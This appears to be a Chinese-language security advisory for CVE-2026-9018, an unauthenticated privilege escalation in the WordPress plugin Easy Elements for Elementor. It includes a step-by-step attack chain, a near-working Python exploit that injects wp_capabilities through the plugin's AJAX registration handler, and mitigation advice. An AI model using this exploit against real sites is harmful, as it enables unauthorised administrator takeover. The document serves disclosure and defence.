CVE-2026-9018 WordPress插件权限提升漏洞

漏洞信息

漏洞编号

CVE-2026-9018

漏洞类型

权限提升

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Easy Elements for Elementor – Addons & Website Templates

漏洞概述

WordPress插件“Easy Elements for Elementor”在1.4.5及之前的所有版本中存在权限提升漏洞。该漏洞源于`easyel_handle_register()`函数中的`wp_ajax_nopriv_eel_register` AJAX处理程序未对`custom_meta` POST数组进行足够的验证。攻击者可利用此漏洞，在注册新用户时覆盖用户元数据（如`wp_capabilities`），从而以未认证身份注册具有管理员级别的账户。利用条件是站点开启了用户注册且页面暴露了登录/注册小工具。

技术细节

该漏洞的核心机制在于插件处理AJAX注册请求时，对用户输入的元数据缺乏严格的校验。具体而言，`easyel_handle_register()`函数通过`wp_ajax_nopriv_eel_register`钩子接收注册请求。在代码逻辑中，它直接遍历攻击者可控的`custom_meta` POST参数数组，并利用`update_user_meta()`函数将所有键值对写入新创建用户的元数据表中。由于没有实施键名白名单机制，攻击者可以传入WordPress系统敏感的元数据键。利用流程如下：攻击者首先访问包含登录/注册小工具的页面，从页面DOM中读取合法的`easy_elements_nonce`值以绕过CSRF防护。随后，攻击者向`/wp-admin/admin-ajax.php`发送精心构造的POST请求，其中包含`custom_meta[wp_capabilities][administrator]=1`。尽管`wp_insert_user()`在创建用户时分配了安全的默认角色，但后续的`update_user_meta()`执行会直接覆盖`wp_capabilities`元数据键，从而将新注册用户的权限提升为管理员，完全控制受影响的WordPress站点。

攻击链分析

STEP 1

侦察

确认目标站点安装了Easy Elements for Elementor插件，且启用了用户注册功能，页面上存在Login/Register小工具。

STEP 2

获取Nonce

访问包含Login/Register小工具的页面，解析HTML源代码，提取`easy_elements_nonce`的值。

STEP 3

发送恶意请求

向`/wp-admin/admin-ajax.php`发送POST请求，传递`action=eel_register`、获取的Nonce以及包含`custom_meta[wp_capabilities][administrator]=1`的恶意载荷。

STEP 4

提升权限

插件处理请求，调用`update_user_meta`覆盖用户权限，攻击者成功注册一个拥有管理员权限的账户。

STEP 5

接管控制

使用注册的管理员账户登录WordPress后台，完全控制站点。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # Configuration target_url = "http://example.com" username = "attacker" password = "P@ssw0rd!" email = "[email protected]" # 1. Get the nonce from the page containing the Login/Register widget # The nonce is usually exposed in the DOM with ID or class related to the plugin print("[+] Fetching nonce...") session = requests.Session() index_page = session.get(target_url) # Note: In a real scenario, parse the HTML to find 'easy_elements_nonce' # Example: nonce = re.search(r'data-nonce="(.*?)"', index_page.text).group(1) # For this PoC, we assume we extracted it. nonce = "EXTRACTED_NONCE_VALUE" # 2. Exploit the Privilege Escalation ajax_url = f"{target_url}/wp-admin/admin-ajax.php" payload = { "action": "eel_register", "easy_elements_nonce": nonce, "username": username, "email": email, "pass": password, # This is the vulnerable part: injecting wp_capabilities "custom_meta[wp_capabilities][administrator]": "1" } print(f"[+] Sending payload to {ajax_url}...") response = session.post(ajax_url, data=payload) if response.status_code == 200: print("[+] Registration request sent.") print(f"[+] Try logging in at {target_url}/wp-admin with user: {username}") else: print("[-] Request failed.")

影响范围

Easy Elements for Elementor <= 1.4.5

防御指南

临时缓解措施

建议立即将插件升级到修复了此漏洞的版本。如果暂时无法升级，应禁用该插件或关闭WordPress站点的用户注册功能，并移除所有包含登录/注册小工具的页面，以阻断攻击路径。